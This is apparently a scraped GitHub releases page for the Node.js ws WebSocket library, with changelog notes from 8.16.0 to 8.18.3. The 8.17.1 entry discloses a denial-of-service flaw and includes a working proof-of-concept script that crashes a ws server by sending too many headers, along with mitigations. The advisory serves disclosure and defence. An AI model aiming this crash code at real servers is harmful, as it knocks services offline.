Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Releases: websockets/ws

8.18.3

28 Jun 13:26
@lpinca lpinca
8.18.3
dabbdec

Choose a tag to compare

View all tags
8.18.3 Latest
Latest

Bug fixes

  • Fixed a spec violation where the Sec-WebSocket-Version header was not added
    to the HTTP response if the client requested version was either invalid or
    unacceptable (#2291).
Assets 2
Loading

8.18.2

02 May 19:03
@lpinca lpinca
8.18.2
0eb8535

Choose a tag to compare

View all tags
8.18.2

Bug fixes

  • Fixed an issue that, during message decompression when the maximum size was
    exceeded, led to the emission of an inaccurate error and closure of the
    connection with an improper close code (#2285).
Loading

8.18.1

21 Feb 09:32
@lpinca lpinca
8.18.1
b92745a

Choose a tag to compare

View all tags
8.18.1

Bug fixes

  • The length of the UNIX domain socket paths in the tests has been shortened to
    make them work when run via CITGM (021f7b8).
Loading

8.18.0

03 Jul 16:39
@lpinca lpinca
8.18.0
976c53c

Choose a tag to compare

View all tags
8.18.0

Features

  • Added support for Blob (#2229).
Loading

8.17.1

16 Jun 14:09
@lpinca lpinca
8.17.1
3c56601

Choose a tag to compare

View all tags
8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding theserver.maxHeadersCount
threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

The vulnerability was reported by Ryan LaPointe in #2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the
    --max-http-header-size=size and/or the maxHeaderSize options so
    that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.
Loading

7.5.10

16 Jun 12:50
@lpinca lpinca
7.5.10
d962d70

Choose a tag to compare

View all tags
7.5.10

Bug fixes

Loading

6.2.3

16 Jun 13:21
@lpinca lpinca
6.2.3
d87f3b6

Choose a tag to compare

View all tags
6.2.3

Bug fixes

Loading

5.2.4

16 Jun 12:43
@lpinca lpinca
5.2.4
aa8fe0a

Choose a tag to compare

View all tags
5.2.4

Bug fixes

Loading

8.17.0

28 Apr 05:49
@lpinca lpinca
8.17.0
b73b118

Choose a tag to compare

View all tags
8.17.0

Features

  • The WebSocket constructor now accepts the createConnection option (#2219).

Other notable changes

  • The default value of the allowSynchronousEvents option has been changed to
    true (#2221).

This is a breaking change in a patch release. The assumption is that the option
is not widely used.

Loading

8.16.0

26 Dec 15:33
@lpinca lpinca
8.16.0
d343a0c

Choose a tag to compare

View all tags
8.16.0

Features

  • Added the autoPong option (01ba54e).
Loading